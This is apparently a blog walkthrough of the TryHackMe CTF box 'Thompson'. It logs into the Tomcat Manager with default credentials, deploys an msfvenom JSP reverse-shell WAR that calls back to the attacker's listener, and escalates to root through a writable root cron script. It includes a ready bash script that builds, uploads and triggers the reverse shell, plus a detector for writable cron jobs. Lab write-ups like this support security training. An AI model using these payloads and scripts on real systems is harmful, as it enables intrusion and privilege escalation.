Thompson — CTF Walkthrough
Hello everyone! Welcome to a new blog post. In this one we cover, step by step, the TryHackMe box named Thompson.
Before starting, make sure that you are connected to the TryHackMe VPN and that the machine has deployed successfully.
After deploying the machine, wait 2–3 minutes and then ping it to confirm that it is reachable.
Here we are getting ping replies from the machine, so it is up and working properly.
Now start the nmap scan to find out the ports open and services running on the machine.
command : nmap -sS -sC -sV -A -O 10.10.112.158
This is a default-style scan (note that -A already implies -sC, -sV and -O), and it shows an HTTP service running on port 8080. Let's check what that service is.
Browsing to it, we find Apache Tomcat/8.5.5 running on port 8080.
For further enumeration we scan for all the directories using gobuster.
Gobuster finds the /manager path, so we can reach the Manager App login prompt, but we don't have credentials yet.
Pressing Cancel on the authentication prompt takes us to Tomcat's 401 error page, which includes example credentials for the Manager App (the same ones configured in this box's tomcat-users.xml).
Now, let's try to log in to the Manager App using the credentials that we found on that page.
We are redirected to the 'Tomcat Web Application Manager' dashboard.
While enumerating the page we found that we can deploy our own war file to the server.
Let's create a payload with the .war extension using msfvenom. LHOST is our VPN IP address and LPORT is the port on which our machine will listen for the incoming connection. Note that the output format is selected with -f (the option -T does not exist in msfvenom).
Command: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.178.153 LPORT=1234 -f war -o shell.war
Our file is created successfully. Now we listen on the port that we defined in our payload.
command: nc -lnvp 1234
Now we upload the WAR file through the "WAR file to deploy" form on the dashboard.
After deploying the file, check the Applications table on the dashboard for the new entry: Tomcat uses the WAR file name (without .war) as the context path, and in this walkthrough the application was deployed under the name 'exploit', so its path is /exploit. Click that path, then go back to the terminal window where the listener is waiting.
Our exploit worked and we have a shell on the machine.
Let's move to /home and list the user directories on the machine. We find a user 'jack'. Inside jack's home directory we find the user flag; cat it and submit it to the TryHackMe challenge.
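The dashboard clicks above can be replaced by Tomcat's Manager text interface, which is handy when the HTML form is awkward to reach through a proxy or you want to redeploy quickly. The script below is an added example for this post and is not the walkthrough's own code: it assumes the walkthrough's target (10.10.112.158:8080) and VPN address (10.9.178.153:1234), and it takes the Manager credentials from the CREDS environment variable rather than hard-coding the ones shown on the 401 page. The context path is derived from the WAR file name exactly as the dashboard does it, which is why the deployed app appears under the same name as the uploaded file.

```bash
#!/usr/bin/env bash
# Added example (not from the original walkthrough): build, deploy and trigger a
# WAR payload through the Tomcat Manager text API (/manager/text/*).
# Assumptions: target and LHOST/LPORT match the walkthrough; CREDS=user:pass must
# be exported by the operator (the credentials from the 401 page are not reproduced here).
set -euo pipefail

TARGET="${TARGET:-10.10.112.158:8080}"
LHOST="${LHOST:-10.9.178.153}"
LPORT="${LPORT:-1234}"
CREDS="${CREDS:-}"

# The Manager deploys an uploaded WAR under a context path equal to the file
# name minus its ".war" suffix: shell.war -> /shell, exploit.war -> /exploit.
context_path_from_war() {
  local war="$1"
  war="${war##*/}"      # drop any directory part
  war="${war%.war}"     # drop the extension
  printf '/%s\n' "$war"
}

# Generate the JSP reverse shell; -f selects the output format (war), -o the file.
build_payload() {
  local out="$1"
  msfvenom -p java/jsp_shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f war -o "$out"
}

# Upload the archive with HTTP PUT. update=true allows redeploying over an
# existing context of the same name instead of failing with "already exists".
deploy_war() {
  local war="$1" path
  [ -n "$CREDS" ] || { echo "set CREDS=user:pass (Manager App credentials)" >&2; return 1; }
  path="$(context_path_from_war "$war")"
  curl -sS -u "$CREDS" -T "$war" "http://$TARGET/manager/text/deploy?path=$path&update=true"
}

# msfvenom's WAR maps its JSP to /* inside the context, so any request to the
# context root runs the payload and connects back to the listener.
trigger() {
  local war="$1" path
  path="$(context_path_from_war "$war")"
  curl -sS -o /dev/null "http://$TARGET$path/"
}

# Remove the context again once you have your shell.
undeploy() {
  local war="$1" path
  path="$(context_path_from_war "$war")"
  curl -sS -u "$CREDS" "http://$TARGET/manager/text/undeploy?path=$path"
}

# Usage (run in this order, with `nc -lnvp "$LPORT"` already listening in another
# terminal):  CREDS=user:pass ./deploy.sh shell.war
if [ "${BASH_SOURCE[0]}" = "$0" ] && [ $# -gt 0 ]; then
  build_payload "$1"
  deploy_war "$1"
  trigger "$1"
fi
```

The same curl calls also work against the 8.x and 9.x Manager text API; the role needed for /manager/text is manager-script, so an account that only has manager-gui (dashboard access) will get a 403 here even though it can click through the form.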
After a lot of enumeration of the crontab, we found a job that runs bash id.sh in the /home/jack directory as root every minute. The directory and the script are writable by jack, so whatever we put in id.sh will be executed by root.
command :
So we overwrite the existing id.sh with our own file containing the command below (the shell redirection replaces the file, so there is no need to delete it first).
command : echo 'cp /root/root.txt /home/jack/root.txt' > id.sh
Within one minute the cron job runs id.sh as root. Listing the current directory, we find root.txt and hence the root flag. If the copied file turns out to be owned by root and not readable by jack (cp keeps the source file's permission bits), add a chmod of the copy to the same line in id.sh and wait one more minute.
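Spotting this privilege escalation by reading the crontab by eye works on a small box, but the check generalises: any job that runs as root and executes a file the current user can write to is the same bug. The following script is an added example for this post, not the walkthrough's own code. It parses a crontab in /etc/crontab format (six fields, with a user column), resolves the scripts each job runs (following a leading `cd DIR &&`, which is exactly the shape of the Thompson job), and prints the ones that are writable by whoever runs the check. The sample crontab used in the test is constructed, not taken from the box.

```bash
#!/usr/bin/env bash
# Added example (not from the original walkthrough): find cron jobs whose
# scripts the current user can modify. Input is a system-format crontab
# (/etc/crontab or a file under /etc/cron.d), which carries a user column.

# Print "user<TAB>command" for each job line, skipping comments, blank lines
# and VAR=value assignments such as SHELL=/bin/sh or PATH=...
cron_jobs() {
  local file="$1"
  awk '
    /^[[:space:]]*#/ || /^[[:space:]]*$/ || /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
    {
      if ($1 ~ /^@/) { user = $2; start = 3 }   # @reboot / @hourly style
      else           { user = $6; start = 7 }   # m h dom mon dow user command
      cmd = ""
      for (i = start; i <= NF; i++) cmd = cmd (i > start ? " " : "") $i
      print user "\t" cmd
    }' "$file"
}

# For each job, walk the command word by word, track `cd DIR`, resolve every
# remaining word to a path (relative to the tracked directory) and report the
# ones that exist and are writable. A root job pointing at such a file is a
# privilege escalation, as with id.sh in /home/jack on this box.
writable_cron_scripts() {
  local file="$1"
  cron_jobs "$file" | while IFS=$'\t' read -r user cmd; do
    local cwd="/" expect_dir=0 tok path words
    # turn shell separators into spaces so `cd X && bash y.sh` splits cleanly
    read -ra words <<< "$(printf '%s' "$cmd" | sed -E 's/(&&|\|\||;|\|)/ /g')"
    for tok in "${words[@]}"; do
      if [ "$expect_dir" = 1 ]; then cwd="$tok"; expect_dir=0; continue; fi
      case "$tok" in
        cd) expect_dir=1; continue ;;
        -*|bash|sh|dash|python*|perl|ruby) continue ;;  # interpreters/flags are not targets
      esac
      path="$tok"
      [ "${path#/}" = "$path" ] && path="${cwd%/}/$path"   # relative -> cwd-based
      if [ -f "$path" ] && [ -w "$path" ]; then
        printf '%s\t%s\n' "$user" "$path"
      fi
    done
  done | sort -u
}

# Usage: ./cronwrite.sh /etc/crontab /etc/cron.d/*
if [ "${BASH_SOURCE[0]}" = "$0" ] && [ $# -gt 0 ]; then
  for f in "$@"; do writable_cron_scripts "$f"; done
fi
```

Run it as the low-privilege user (jack here), since `-w` answers for the invoking user; run as root it will report every existing script, which is not what you want to know. It deliberately does not follow scripts that are merely readable, or interpreters pulled in via a relative PATH, which are separate checks.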
We have successfully completed the challenge. I hope you enjoyed it.
Thank you.